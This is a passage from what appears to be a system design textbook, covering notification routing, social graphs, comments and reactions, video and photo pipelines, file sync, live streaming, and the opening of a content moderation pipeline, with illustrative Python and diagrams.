[ delivery status via webhooks ] -> analytics, bounce/complaint handling
from datetime import datetime, timedelta
class NotificationRouter:
TRANSACTIONAL = {"password_reset", "payment_receipt", "security_alert"}
def should_send(self, user, event_type: str, now: datetime) -> tuple[bool, str]:
# Transactional notifications bypass preference suppression — they are
# often a legal or security obligation, not a marketing choice.
if event_type in self.TRANSACTIONAL:
return True, "transactional"
if not user.prefs.get(event_type, {}).get("enabled", True):
return False, "user_opted_out"
if user.globally_unsubscribed:
return False, "unsubscribed"
# Quiet hours are evaluated in the USER's timezone, not the server's.
local_hour = now.astimezone(user.tz).hour
if user.quiet_start <= local_hour or local_hour < user.quiet_end:
return False, "quiet_hours_defer" # defer, do not drop
sent_today = self.counter.get(user.id, window=timedelta(days=1))
if sent_today >= user.daily_cap:
return False, "frequency_cap"
return True, "ok"
def enqueue(self, user, event_type: str, payload: dict, dedupe_key: str):
# DEDUPLICATION: retries from producers, and duplicate upstream events,
# must not produce two notifications. The key is the producer's
# responsibility to make meaningful (e.g. "order-123-shipped").
if not self.dedupe.set_if_absent(dedupe_key, ttl=86_400):
return "duplicate_suppressed"
ok, reason = self.should_send(user, event_type, datetime.utcnow())
if not ok:
return reason
channel = self.pick_channel(user, event_type) # push -> email fallback
self.queues[channel].publish({
"user_id": user.id, "event_type": event_type,
"payload": payload, "attempt": 0, "dedupe_key": dedupe_key})
return "queued"
Delivery reliability is at-least-once by construction: providers time out ambiguously, so a retry may produce a second delivery. That makes the dedupe key the primary defence, and it must be checked at the point of send, not only at enqueue. Retries need exponential backoff with jitter (13.3), a bounded attempt count, and a dead-letter queue that a human actually reviews. Provider failures should trip a circuit breaker and fail over to a secondary provider where the channel supports it.
Priority separation is non-negotiable in the queue design. A password reset must not sit behind a five-million-message marketing campaign, so transactional and promotional traffic get separate queues (and often separate provider credentials, since bulk sending damages sender reputation and can throttle transactional email).
Fan-out control is the other operational hazard: an incident that triggers one notification per affected entity can generate millions of messages, so the service needs aggregation ("3 new comments" rather than three notifications), per-user frequency caps as above, and a global kill switch for a campaign that is going wrong.
Key Takeaways
- Accept fast and queue: bursts are the normal traffic shape, not an anomaly.
- Separate queues per channel and per priority so bulk traffic cannot block transactional delivery.
- Preferences, quiet hours, and frequency caps are filters in the pipeline; transactional notifications legitimately bypass most of them.
- Delivery is at-least-once — deduplicate on a producer-supplied key at send time.
- Wrap every provider in a circuit breaker with retry backoff, a dead-letter queue, and a failover provider.
- Aggregate related notifications and keep a global kill switch.
🧪 Practice
- Design the schema for user notification preferences supporting per-event, per-channel opt-outs plus quiet hours across timezones.
- Work out the retry policy for push notifications, including backoff, attempt cap, and what lands in the dead-letter queue.
- Interview: A bug caused 2 million duplicate emails. What in your design should have prevented it, and what limits the damage? (Hint: think about the two separate places a duplicate can be caught, and what caps the blast radius even when both fail.)
Design a Social Graph Service
The social graph answers questions that look simple and are computationally awkward at scale: who does this user follow, who follows them, are these two users connected, and what does a friend-of-a-friend traversal return. The difficulty is that the graph is enormous, extremely skewed (most users have hundreds of edges; some have hundreds of millions), and read at a rate far above the rate at which it changes.
Requirements. Follow and unfollow; list followers and following with pagination; test whether A follows B in a single-digit millisecond; compute mutual connections; produce follower counts. Non-functional: reads dominate writes by roughly 1000:1, and the "does A follow B" check sits on the critical path of nearly every other feature, so it must be fast enough to call unconditionally.
Storage model. A graph database is the obvious fit and is the wrong default at this scale for the common queries; the dominant production pattern is adjacency lists in a partitioned key-value or wide-column store, with each direction of the edge stored separately.
EDGE STORAGE: STORE BOTH DIRECTIONS
following:<user_id> -> sorted set of followee_ids (partition by user_id)
followers:<user_id> -> sorted set of follower_ids (partition by user_id)
follow(A, B) writes TWO records in different partitions:
following:A += B followers:B += A
Why duplicate? Because "who follows B" would otherwise be a full scan of every
user's following list. The cost is that a follow is a distributed write that
must be made idempotent and eventually consistent (a queue-driven second write
with retry is normal; a cross-partition transaction is usually not worth it).
SKEW: followers:<celebrity> can hold 100M entries. It must be a paginated,
partitioned structure — never a single value read in one operation.
class SocialGraph:
def follow(self, follower: str, followee: str) -> str:
if follower == followee:
return "self_follow_rejected"
if self.blocks.exists(followee, follower): # blocks override follows
return "blocked"
# Idempotent: repeating a follow must not double-count anything.
created = self.kv.zadd_if_absent(f"following:{follower}", followee)
if not created:
return "already_following"
# Second write in another partition. Publish rather than write inline so
# a partition failure retries instead of leaving one side missing.
self.outbox.publish({"op": "add_follower", "user": followee,
"other": follower})
self.counters.increment(f"following_count:{follower}")
self.counters.increment(f"follower_count:{followee}") # approximate
return "ok"
def is_following(self, a: str, b: str) -> bool:
# The hottest query in the system. Cached aggressively; a Bloom filter
# per user answers the overwhelmingly common NO case without a lookup.
if not self.bloom(a).might_contain(b):
return False # definitive negative, no I/O
return self.kv.zscore(f"following:{a}", b) is not None
def mutual_connections(self, a: str, b: str, limit: int = 10) -> list[str]:
# Intersect the SMALLER set against the larger — never materialize both.
sa, sb = self.kv.zcard(f"following:{a}"), self.kv.zcard(f"following:{b}")
small, large = (a, b) if sa <= sb else (b, a)
out = []
for uid in self.kv.zscan(f"following:{small}"): # streamed
if self.kv.zscore(f"following:{large}", uid) is not None:
out.append(uid)
if len(out) == limit:
break
return out
Counts deserve their own treatment. An exact follower count for a celebrity
requires either a counter that becomes a write hotspot or a COUNT over 100M
entries. The standard resolution is a sharded counter (increment a random one of
N shards, sum on read) with a cached value refreshed periodically — and accepting
that displayed counts are approximate and eventually consistent, which every
large platform does.
Traversals beyond one hop are where the design must push back. Friend-of-a- friend across high-degree nodes explodes combinatorially, so second-degree queries are answered from precomputed, bounded results (a nightly job producing "people you may know" candidates, 14.3.3) rather than at request time. Interactive multi-hop traversal is a graph-database workload and belongs in a separate system fed asynchronously, not on the serving path.
Finally, privacy semantics must be part of the design rather than a filter bolted on top: blocks must be enforced on both read and write paths, private accounts turn follows into pending requests, and the visibility rule must be evaluated at read time because relationships change after content is created.
Key Takeaways
- Store adjacency lists in both directions; the duplicate write is what makes "who follows me" cheap.
- The double write is cross-partition — make it idempotent and drive the second side from a queue rather than a distributed transaction.
- "Does A follow B" is the hottest query: cache it, and use a per-user Bloom filter to answer the common negative without I/O.
- Degree skew is the defining constraint: celebrity follower lists must be paginated and never read whole.
- Counts are approximate at scale — shard the counters and cache the result.
- Precompute multi-hop results offline; do not traverse at request time.
- Blocks and privacy are read-time checks, not a one-off write-time filter.
🧪 Practice
- Design the pagination scheme for a 100M-entry follower list, including a cursor that remains stable while new followers arrive.
- Implement follower counts with sharded counters and quantify the read cost versus a single counter's write contention.
- Interview: A user unfollows someone but still sees their posts for a few minutes. Is this acceptable? (Hint: think about which precomputed structures hold the stale relationship, and what it would cost to make the change immediate everywhere.)
Design a Comment and Reaction System
Comments and reactions attach user-generated content to any other entity — a post, a video, a product — and they are the highest-write-rate feature most products have. Two properties make them harder than they look: comments are a tree, not a list, and reactions are a counter update that concentrates on whatever is currently viral, producing extreme write hotspots on a small number of keys.
Requirements. Post a comment, optionally replying to another comment; list a thread with pagination and a sensible ordering (chronological, or ranked by engagement); react to a comment or a post; show aggregate reaction counts and whether the current user has reacted; edit and delete; moderate.
Estimates. 500M reactions/day is ~6k/s average, but a viral item can attract 50k reactions per second by itself — a single-row update rate no relational database will sustain. That number, not the average, dictates the design.
Storing the tree. Three representations, chosen by how deep threads go:
| Model | Read a thread | Insert | Depth limit | Best for |
|---|---|---|---|---|
| Parent pointer | Recursive queries | O(1) | Unlimited | Shallow threads |
| Materialized path | One prefix range scan | O(1) | Path length | Deep, ordered trees |
| Nested set | One range query | O(n) | Unlimited | Read-only trees |
Materialized paths are the usual production choice because a whole subtree is one sorted range scan, and correct display ordering falls out of the sort.
class CommentStore:
"""Materialized path: each comment stores the ordered path to its root.
Path segments are fixed-width and zero-padded so lexical sort == tree order."""
WIDTH = 10
def create(self, entity_id: str, author: str, body: str,
parent_id: str | None = None) -> dict:
seq = self.counter.next(entity_id) # monotonic per entity
segment = str(seq).zfill(self.WIDTH)
if parent_id:
parent = self.get(parent_id)
if parent["depth"] >= 6:
# CAP DEPTH: unlimited nesting is unreadable on mobile and makes
# paths unbounded. Deeper replies attach to the depth-6 ancestor.
parent = self.get(parent["path"].split("/")[6])
path, depth = f"{parent['path']}/{segment}", parent["depth"] + 1
else:
path, depth = segment, 0
comment = {"id": self.ids.next_id(), "entity_id": entity_id,
"author": author, "body": body, "path": path, "depth": depth,
"created_at": time.time(), "deleted": False}
self.db.insert(comment) # partition key: entity_id
self.counters.increment(f"comments:{entity_id}")
return comment
def thread(self, entity_id: str, after_path: str | None, limit: int = 50):
# ONE range scan returns a correctly ordered slice of the whole tree:
# sorting by path yields parents immediately before their children.
return self.db.scan(partition=entity_id, sort_key_gt=after_path,
limit=limit)
# path examples, sorted lexically -> exactly the display order:
# 0000000001 top-level comment
# 0000000001/0000000004 reply to it
# 0000000001/0000000004/0000000009 reply to the reply
# 0000000002 next top-level comment
Reactions are a different problem: a high-frequency counter plus a per-user
membership set (so the UI can show "you reacted"). The naive UPDATE posts SET likes = likes + 1 serializes every reaction to a viral post on one row lock. The
production pattern writes an immutable event and aggregates asynchronously,
combined with a sharded counter for the live display value.
class ReactionService:
SHARDS = 64
def react(self, user_id: str, target_id: str, kind: str) -> str:
# 1. Per-user membership: idempotent, and answers "did I react?"
added = self.kv.set_if_absent(f"reacted:{target_id}:{user_id}", kind)
if not added:
return "already_reacted"
# 2. Sharded counter: spreads 50k writes/s across 64 keys, so no single
# key is a hotspot. Read cost is one multi-get of 64 small values.
shard = hash(user_id) % self.SHARDS
self.kv.increment(f"count:{target_id}:{kind}:{shard}")
# 3. Event for analytics and for rebuilding counts if they drift.
self.events.publish({"user": user_id, "target": target_id, "kind": kind})
return "ok"
def counts(self, target_id: str, kind: str) -> int:
cached = self.cache.get(f"count:{target_id}:{kind}")
if cached is not None:
return cached # hot items served from cache
total = sum(self.kv.multi_get(
[f"count:{target_id}:{kind}:{s}" for s in range(self.SHARDS)]))
self.cache.set(f"count:{target_id}:{kind}", total, ttl=5) # short TTL:
return total # counts may lag by seconds — fine
Ranking and moderation complete the design. Ordering a large thread purely chronologically buries the good replies, so ranked ordering (engagement, author reputation, recency) is computed asynchronously and cached per thread. Deletion should be a tombstone rather than a physical delete, because removing an interior node would orphan its subtree — render deleted nodes as placeholders when they have children. Moderation hooks into the write path for synchronous blocking of obvious violations and into an asynchronous pipeline (15.3.5) for everything else.
Key Takeaways
- Comments are a tree: materialized paths turn subtree reads into a single ordered range scan.
- Cap nesting depth — unbounded threads are unreadable and make paths unbounded.
- Partition by the parent entity so a whole thread lives in one partition.
- Reactions concentrate writes on viral items: shard the counter and never increment a single row.
- Keep a per-user membership record for idempotency and for "you reacted".
- Counts are eventually consistent with a short cache TTL; the event log allows rebuilding them.
- Delete with tombstones so interior nodes do not orphan their subtrees.
🧪 Practice
- Design the pagination cursor for a threaded view that loads top-level comments with two replies each, then expands on demand.
- Compute the write rate on a single counter row for a post receiving 30k reactions/second, and show how 64 shards change it.
- Interview: A post goes viral and reaction counts stop updating. What broke and how would you have prevented it? (Hint: think about which single key every one of those writes is contending for, and what the read path could tolerate instead.)
<a id="153-media-and-content-systems"></a>
15.3 Media and Content Systems
Media systems move bytes that are millions of times larger than the metadata describing them, which inverts the usual priorities: the database is trivial and the storage, encoding, and delivery paths are where the entire design lives. This subchapter covers video on demand, photo sharing, file sync, live streaming, and the moderation pipeline that every user-generated content platform eventually needs.
Design a Video Streaming Platform
A video platform accepts uploads, transforms them into a set of formats suitable for every device and network condition, and delivers them to millions of concurrent viewers. The volume asymmetry defines everything: a 4K source file is tens of gigabytes, while its metadata row is a few hundred bytes, and one upload may be watched a billion times. So the design is a pipeline plus a delivery network, with a small database off to the side.
Requirements. Upload large files reliably over unreliable connections; transcode into multiple resolutions and bitrates; stream adaptively so playback survives changing bandwidth; support seeking; and track view counts and watch progress. Non-functional: playback must start in under ~2 seconds, rebuffering must be rare, and the system must serve globally.
Estimates. 500 hours uploaded per minute at ~1 GB/hour source is ~500 GB/min of ingest (~8.5 TB/hour). Transcoding into 6 renditions typically produces 1.5-2x the source size in outputs. Viewing dominates by orders of magnitude: 1 billion watch-hours/day at an average 3 Mbps is ~1,350 Tbps-hours, which is why essentially all delivery must come from a CDN — origin serving at that scale is not financially or physically viable.
VIDEO PIPELINE
UPLOAD PROCESSING DELIVERY
client [ queue ] viewer
| pre-signed URL | |
v (direct to object store, v v
| never through your API) [ transcode workers ] [ CDN edge ]
| chunked + resumable split into segments | miss
v -> parallel encode per v
[ object storage: raw ] rendition [ origin / object
| -> package HLS/DASH storage: HLS
+--> event ---------------> -> thumbnails, captions segments ]
-> write manifest
|
v
[ metadata DB: status, durations,
rendition list, manifest URL ]
Upload must be resumable, because a 20 GB upload over a mobile connection will be interrupted. The client requests a pre-signed URL and uploads directly to object storage in parts, so bytes never traverse the application tier; the application only receives a completion event. This one decision removes the largest bandwidth cost and the largest source of request-timeout failures.
Transcoding is embarrassingly parallel if you split first. Cutting the source into segments at keyframe boundaries lets N workers encode N segments concurrently, turning a 4-hour serial job into a 5-minute parallel one.
LADDER = [ # a standard adaptive bitrate ladder
{"name": "240p", "width": 426, "bitrate_kbps": 400},
{"name": "360p", "width": 640, "bitrate_kbps": 800},
{"name": "480p", "width": 854, "bitrate_kbps": 1400},
{"name": "720p", "width": 1280, "bitrate_kbps": 2800},
{"name": "1080p", "width": 1920, "bitrate_kbps": 5000},
{"name": "2160p", "width": 3840, "bitrate_kbps": 15000},
]
def plan_transcode(source_width: int, duration_s: float, segment_s: int = 6):
"""Split into segments, then fan out over (segment x rendition) tasks.
Never upscale: encoding 1080p source to 4K wastes storage and bandwidth
for no visible gain."""
renditions = [r for r in LADDER if r["width"] <= source_width]
segments = int(duration_s // segment_s) + 1
tasks = [(seg, r["name"]) for seg in range(segments) for r in renditions]
serial_min = duration_s * len(renditions) * 0.5 / 60 # ~0.5x realtime
return {"renditions": [r["name"] for r in renditions],
"segments": segments, "parallel_tasks": len(tasks),
"serial_estimate_min": round(serial_min, 1),
"with_200_workers_min": round(serial_min / min(200, len(tasks)), 2)}
print(plan_transcode(source_width=1920, duration_s=3600))
# {'renditions': [...5 items...], 'segments': 601, 'parallel_tasks': 3005,
# 'serial_estimate_min': 150.0, 'with_200_workers_min': 0.75}
Adaptive bitrate streaming (HLS or DASH) is what makes playback robust. The video is packaged as short segments at every rendition, plus a manifest listing them; the player measures throughput and buffer level and picks the next segment's rendition itself. The server is stateless — it serves files — which is precisely why a CDN can absorb the entire load.
HLS MANIFEST STRUCTURE
master.m3u8
#EXT-X-STREAM-INF:BANDWIDTH=800000,RESOLUTION=640x360 -> 360p/index.m3u8
#EXT-X-STREAM-INF:BANDWIDTH=2800000,RESOLUTION=1280x720 -> 720p/index.m3u8
720p/index.m3u8
#EXTINF:6.0, seg_00001.ts
#EXTINF:6.0, seg_00002.ts <- player fetches these one at a time and
... can switch ladder rungs at any boundary
Player logic: buffer low or throughput dropping -> step DOWN a rung immediately;
step UP only after sustained headroom, because oscillation is worse than a
slightly lower resolution.
Delivery and cost. The CDN is not an optimization here, it is the architecture: origin egress at this scale would dominate every other cost line (13.4). Popular content is cached at the edge with very high hit rates, while the long tail is served from a mid-tier or origin. Storage tiering matters too — videos have a sharply decaying access curve, so old, rarely-watched renditions move to cold storage, and rarely-requested renditions can be deleted and re-encoded on demand.
Trade-offs worth naming: pre-transcoding every rendition costs storage and compute for videos nobody watches (mitigate by encoding only low renditions eagerly and the rest on first request); per-title encoding (choosing the ladder from content complexity) saves substantial bandwidth over a fixed ladder; and DRM plus signed URLs are required for licensed content, which constrains how much the CDN can cache.
Key Takeaways
- Upload directly to object storage with pre-signed, resumable, chunked uploads — never through the application tier.
- Split into segments first: transcoding is then embarrassingly parallel.
- Encode an adaptive ladder, never upscale beyond the source resolution.
- HLS/DASH keeps the server stateless and moves adaptation into the player, which is what makes CDN delivery possible.
- The CDN is the architecture, not an add-on; origin egress would dominate all other costs.
- Tier storage by access decay, and consider on-demand encoding for the long tail.
🧪 Practice
- Compute storage for one hour of source video encoded into six renditions, then estimate the monthly cost of retaining 500 hours/minute of uploads.
- Design the transcoding job graph so a single failed segment does not force a full re-encode.
- Interview: A user in a poor network region reports constant buffering. Walk through the diagnosis. (Hint: think about what the player decides, what the manifest offers it, and how far the bytes are travelling.)
Design a Photo Sharing Service
Photo sharing sits between a social feed and a media pipeline: uploads are small relative to video but arrive in enormous numbers, each original spawns several derived sizes, and the read pattern is a feed of thumbnails punctuated by occasional full-size views. The design questions are how many derivatives to generate and when, and how to keep the feed fast when it renders dozens of images per screen.
Requirements. Upload photos with metadata; generate thumbnails and display sizes; serve them fast in feeds and albums; support albums, tags, and sharing permissions; handle EXIF (orientation matters, location often must be stripped).
Estimates. 100M photos/day at 3 MB average is 300 TB/day of originals. Derived sizes typically add 30-40% on top. Reads are far heavier: if each photo is viewed 20 times as a thumbnail and 2 times full size, thumbnail traffic dominates request count while full-size dominates bytes — which is why the two are tuned separately.
PHOTO PIPELINE
client --pre-signed PUT--> [ object storage: originals ]
| |
| POST metadata +-- event --> [ derivative workers ]
v |-- 150px square thumb
[ metadata DB ] |-- 640px feed image
photo_id, owner, album, caption, |-- 1080px detail view
dimensions, taken_at, visibility, |-- WebP/AVIF variants
derivative status '-- strip EXIF GPS
| |
v v
[ feed / album service ] <----- URLs ----- [ object storage: derivatives ]
|
v
[ CDN ] <- all reads
Alternative: an image-resizing CDN generates sizes ON DEMAND from the original
and caches them. Fewer stored variants, more first-request latency.
Derivative generation is the main trade-off. Pre-generating every size gives uniform fast reads and costs storage for sizes nobody requests; on-demand resizing at the edge stores only the original and pays a one-time latency cost per (size, format) combination. The common compromise is to pre-generate the two or three sizes the product renders most (thumbnail and feed image) and derive the rest on demand.
from dataclasses import dataclass
@dataclass
class Derivative:
name: str
max_edge: int
quality: int
eager: bool # generated at upload time vs on first request
DERIVATIVES = [
Derivative("thumb", 150, 80, eager=True), # every feed renders these
Derivative("feed", 640, 82, eager=True),
Derivative("detail", 1080, 85, eager=False), # only on photo open
Derivative("full", 2048, 88, eager=False),
]
def process_upload(photo_id: str, original_bytes: bytes, exif: dict) -> dict:
# EXIF orientation must be APPLIED and then stripped: clients that ignore
# the tag render sideways photos, and this is the classic "why is it rotated"
# bug. GPS is stripped for privacy unless the user opted in (11.4).
normalized = apply_orientation(original_bytes, exif.get("Orientation", 1))
safe_exif = {k: v for k, v in exif.items()
if not k.startswith("GPS") and k != "SerialNumber"}
outputs = {}
for d in DERIVATIVES:
if d.eager:
outputs[d.name] = encode(normalized, d.max_edge, d.quality,
formats=("avif", "webp", "jpeg"))
return {"photo_id": photo_id, "exif": safe_exif, "derivatives": outputs,
"lazy": [d.name for d in DERIVATIVES if not d.eager]}
def pick_url(photo_id: str, viewport_px: int, dpr: float, accepts: set[str]):
"""Serve the smallest derivative that still covers the rendered size, in the
best format the client accepts. Serving a 2048px image into a 320px slot is
the most common and most expensive mistake in image delivery."""
needed = viewport_px * dpr
choice = next((d for d in DERIVATIVES if d.max_edge >= needed),
DERIVATIVES[-1])
fmt = ("avif" if "image/avif" in accepts else
"webp" if "image/webp" in accepts else "jpeg")
return f"https://cdn.example.com/{photo_id}/{choice.name}.{fmt}"
print(pick_url("p_123", viewport_px=320, dpr=2.0, accepts={"image/webp"}))
# https://cdn.example.com/p_123/feed.webp (640px covers 320 x 2)
Metadata and permissions are an ordinary database problem, with one caveat: visibility must be enforced on the URL, not only in the API. Because images are served from a CDN by URL, a private photo protected only by an API check is public to anyone with the link. Private content needs signed URLs with short expiry, and the signature must be verified at the edge.
Feed rendering is the performance path. It should return a batch of URLs plus dimensions (so the client can reserve layout space and avoid reflow), use progressive or blurred placeholders for perceived speed, and let the client request only the sizes it will actually display. Deduplicate identical uploads by content hash — a surprising fraction of uploads are re-shares of the same bytes.
Key Takeaways
- Upload originals directly to object storage; process derivatives asynchronously from an event.
- Pre-generate the sizes the product renders constantly, derive the rest on demand.
- Apply and then strip EXIF: orientation must be baked in, GPS removed by default.
- Serve the smallest derivative that covers the rendered size, in the best format the client accepts.
- CDN URLs bypass API authorization — private photos need signed URLs verified at the edge.
- Return dimensions with feed URLs so clients avoid layout reflow.
- Deduplicate by content hash before storing.
🧪 Practice
- Compute the storage overhead of four derivative sizes plus three formats per photo, and decide which combinations to make eager.
- Design the signed-URL scheme for private albums, including expiry and what happens when a link is shared after revocation.
- Interview: The mobile feed is slow on 3G despite a CDN. What do you investigate? (Hint: think about how many bytes are actually being sent per visible image, and which decision determines that.)
Design a File Storage and Sync Service
A sync service keeps a set of files identical across a user's devices and the cloud. It is deceptively hard because it is a distributed-consistency problem disguised as a file browser: devices go offline, edit the same file, run out of disk, and reconnect in any order, and the system must converge without silently destroying anyone's work.
Requirements. Upload and download files; sync changes to all devices quickly; work offline and reconcile on reconnect; version history; sharing with permissions; efficient handling of large files and small edits. Non-functional: minimize bandwidth (users edit a 2 GB file by changing 40 KB), never lose data, and detect conflicts explicitly rather than resolving them by luck.
Chunking is the core mechanism. Files are split into content-defined chunks, each identified by its hash. Sync then transfers only chunks the other side lacks, which delivers deduplication (across versions, files, and users) and delta transfer from one idea.
CONTENT-DEFINED CHUNKING vs FIXED-SIZE
fixed 4 MB blocks: [A][B][C][D]
insert 1 byte at the start -> every block shifts -> ALL blocks change
-> full re-upload of a 2 GB file for a one-byte edit
content-defined (rolling hash picks boundaries at data-dependent points):
[A][B][C][D]
insert 1 byte -> [A'][B][C][D] only the affected chunk changes
-> upload one ~4 MB chunk. This property is why sync services use it.
import hashlib
WINDOW, MIN_CHUNK, MAX_CHUNK = 48, 2 << 20, 8 << 20
MASK = (1 << 22) - 1 # ~4 MB average chunk size
def content_defined_chunks(data: bytes):
"""Split at data-dependent boundaries so an insertion shifts only ONE chunk.
(A production implementation uses a proper rolling hash such as Buzhash;
this shows the boundary condition.)"""
chunks, start, h = [], 0, 0
for i in range(len(data)):
h = ((h << 1) + data[i]) & 0xFFFFFFFF # cheap rolling value
size = i - start + 1
if size >= MIN_CHUNK and (h & MASK) == 0 or size >= MAX_CHUNK:
chunks.append(data[start:i + 1]) # boundary found
start, h = i + 1, 0
if start < len(data):
chunks.append(data[start:])
return chunks
def sync_plan(local: list[bytes], remote_hashes: set[str]):
"""Upload only chunks the server does not already hold — from ANY user,
since chunks are content-addressed and therefore globally deduplicated."""
manifest, to_upload = [], []
for c in local:
h = hashlib.sha256(c).hexdigest()
manifest.append(h)
if h not in remote_hashes:
to_upload.append((h, len(c)))
return {"manifest": manifest, "upload_chunks": len(to_upload),
"upload_bytes": sum(n for _, n in to_upload)}
Change propagation uses a per-account monotonically increasing cursor. Each device stores its last-seen cursor; on reconnect it asks for everything after it, which handles offline periods, missed notifications, and duplicates uniformly. Live notification (a long-lived connection or push) is an optimization on top of the cursor, not a replacement for it — the cursor is what guarantees eventual convergence.
SYNC PROTOCOL
device server
|-- GET /delta?cursor=1041 --------->|
|<-- {changes:[...], cursor:1073} ---| changes since the device last synced
| |
|-- PUT /commit {path, base_rev, | base_rev = the revision the edit
| manifest:[chunk hashes]} ----->| was made against
|<-- 409 CONFLICT {server_rev} ------| someone else committed meanwhile
| |
|-- creates "file (conflicted copy | NEVER silently pick a winner for
| from Ana's laptop).docx" ------->| opaque binary content
Conflict handling must be explicit. Last-write-wins on a document silently destroys work; the standard behaviour is optimistic concurrency (commit against a base revision, reject if the server moved) followed by preserving both versions as a conflicted copy for the user to resolve. Structured formats can do better — operational transformation or CRDTs merge concurrent edits automatically — but that only applies where the system understands the file's internal structure.
Metadata versus data should scale separately: the metadata service (file tree, revisions, permissions, cursors) is a transactional database sharded by account, while the chunk store is a content-addressed blob store that is append-only and trivially cacheable. Deletion then requires reference counting before a chunk can be reclaimed, since many files and users may share it.
Key Takeaways
- Content-defined chunking gives delta transfer and global deduplication from one mechanism; fixed-size blocks break on insertion.
- Content-addressed chunks let the server skip any chunk it already holds, from any user.
- A per-account monotonic cursor is what makes offline reconnection converge; push notification is only an optimization.
- Use optimistic concurrency with a base revision, and preserve conflicted copies rather than picking a winner.
- Separate the transactional metadata service from the append-only chunk store.
- Deleting shared chunks requires reference counting.
🧪 Practice
- Compute the bytes transferred when a 2 GB file changes by 100 KB in the middle, under fixed 4 MB blocks versus content-defined chunking.
- Design the offline queue on the client, including ordering, retry, and what happens when the local queue conflicts with itself.
- Interview: Two users edit the same file offline and reconnect. What does your system do? (Hint: the honest answer depends on whether the system can parse the file — say what you do when it cannot.)
Design a Live Streaming System
Live streaming shares its vocabulary with video on demand and almost none of its constraints. The content does not exist before it is requested, so nothing can be precomputed; latency is a product requirement rather than a nicety; and viewer count can go from zero to a million in the seconds after a notification fires. Every design decision trades latency against scale and robustness.
Requirements. Ingest a live feed from a broadcaster; transcode to multiple renditions in real time; deliver to a large, spiky audience; keep glass-to-glass latency within the product's tolerance; optionally record for later VOD; support chat or reactions alongside.
Latency tiers determine the protocol, and this is the first thing to establish, because it constrains everything downstream:
| Tier | Latency | Technology | Use case |
|---|---|---|---|
| Standard | 30-60 s | HLS/DASH, 6-10 s segments | Large broadcasts |
| Low latency | 5-15 s | LL-HLS/LL-DASH, chunks | Sports, live events |
| Ultra-low | 1-3 s | LL-HLS tuned, CMAF | Auctions, betting |
| Real-time | < 500 ms | WebRTC | Video calls, interaction |
The relationship is mechanical: HLS latency is roughly the segment duration times the number of segments the player buffers, so cutting latency means smaller segments — more requests, more overhead, and less resilience to a network hiccup.
LIVE PIPELINE
broadcaster --RTMP/SRT/WebRTC--> [ ingest edge ]
| (authenticate stream key,
| pick nearest POP)
v
[ live transcoder ] real-time, no retries:
| a late frame is a dropped frame
| -> renditions + CMAF/LL-HLS packaging
v
[ origin: rolling window of segments,
typically only the last 1-5 minutes ]
|
+-------------+-------------+
v v v
[ CDN edge ] [ CDN edge ] [ CDN edge ]
| | |
viewers viewers viewers
KEY PROPERTY: every viewer requests the SAME newest segment at nearly the same
time, so CDN cache hit rates are extremely high — one origin fetch serves a
million viewers. This is what makes live scale at all.
def latency_budget(segment_s: float, buffer_segments: int,
encode_s: float = 1.0, network_s: float = 0.5) -> dict:
"""Glass-to-glass latency for segmented live streaming."""
packaging = segment_s # cannot publish a partial segment
player_buffer = segment_s * buffer_segments
total = encode_s + packaging + network_s + player_buffer
return {"segment_s": segment_s, "buffer_segments": buffer_segments,
"glass_to_glass_s": round(total, 1)}
for seg, buf in ((6, 3), (2, 3), (1, 2)):
print(latency_budget(seg, buf))
# {'segment_s': 6, 'buffer_segments': 3, 'glass_to_glass_s': 25.5}
# {'segment_s': 2, 'buffer_segments': 3, 'glass_to_glass_s': 9.5}
# {'segment_s': 1, 'buffer_segments': 2, 'glass_to_glass_s': 4.5}
# Smaller segments cut latency but multiply request count and leave the player
# less buffer to absorb a network stall — the trade is explicit, not free.
Ingest needs its own resilience story. The broadcaster's uplink is the least reliable component in the system, so the ingest tier should accept a reconnect without terminating the stream, support a backup ingest URL, and apply adaptive bitrate on the contribution side. Transcoding is real time and cannot retry: if a worker falls behind, it must drop frames or degrade quality rather than queue, because queued live video is just late video.
Scale-up is the other distinctive problem. A notification to millions of followers produces a near-instantaneous viewer surge, and every one of those players requests the manifest and the same segment at once. Mitigations are manifest caching with very short TTLs, jittered client polling so requests do not synchronize, and CDN pre-warming for scheduled events. Where interactivity is not required, a DVR window (a rolling recording) lets late joiners start slightly behind live, which spreads their requests across segments.
Companion features have their own scaling shape: live chat at a million concurrent viewers cannot show every message to everyone, so it is sampled or sharded into rooms; reaction counts use the sharded-counter pattern from 15.2.5.
Key Takeaways
- Nothing can be precomputed: content is created as it is consumed.
- Latency is set by segment duration times player buffer — pick the tier first, since it constrains protocol and architecture.
- WebRTC is the only sub-second option and does not scale like HTTP segments; segmented protocols scale via the CDN.
- Every viewer wants the same newest segment, giving extremely high CDN hit rates — this is why live scales.
- Real-time transcoding must drop rather than queue; queued live video is late video.
- Handle ingest reconnection and provide a backup ingest path.
- Surges are the normal traffic shape: jitter client polling and pre-warm for scheduled events.
🧪 Practice
- Compute glass-to-glass latency for 4-second segments with a 3-segment buffer, then find the configuration that reaches under 5 seconds.
- Design the failover path for a broadcaster whose connection drops for 20 seconds mid-stream.
- Interview: A stream with 2 million viewers has 30-second latency and you need 5. What changes and what does it cost? (Hint: identify each additive term in the latency budget and what shrinking it does to request volume and stall resilience.)
Design a Content Moderation Pipeline
Any platform accepting user-generated content must decide what to allow. The engineering problem is that volume makes full human review impossible, accuracy requirements differ enormously by category, and the cost of both error types is high — leaving harmful content up damages users, while removing legitimate content damages trust. The pipeline design is fundamentally about routing decisions to the cheapest mechanism that can make them reliably.
Requirements. Screen text, images, and video at upload and post-publication; enforce policy categories with different severity; support automated action, human review, and user appeals; keep an audit trail; adapt as policies and adversaries change. Non-functional: synchronous checks must fit the upload latency budget, and the queue must be prioritized so severe content is reviewed first.
The tiered funnel is the standard architecture, and it mirrors the recommendation funnel of 14.3.3: cheap filters first, expensive judgement last.
MODERATION FUNNEL
upload ---> [ TIER 0: deterministic checks ] microseconds, synchronous
hash matching against known-bad
(PhotoDNA/CSAM, terrorism hashes),
blocklists, banned domains
| match -> BLOCK immediately + mandatory reporting
v no match: publish (or hold, by policy)
[ TIER 1: ML classifiers ] ~100 ms, asynchronous
nudity, violence, spam, hate speech
| score > high_threshold -> auto-remove
| score in grey band -> queue for humans
| score < low_threshold -> allow
v
[ TIER 2: human review ] minutes to hours
prioritized by severity x reach
|
v
[ decision: allow / remove / restrict / escalate ]
|-- notify user, offer appeal
'-- feed labelled outcome back into training data (14.4.6)
USER REPORTS enter at Tier 1 or 2 directly, weighted by reporter reliability.
from dataclasses import dataclass
@dataclass
class Policy:
category: str
auto_remove_at: float # score above this: remove without human review
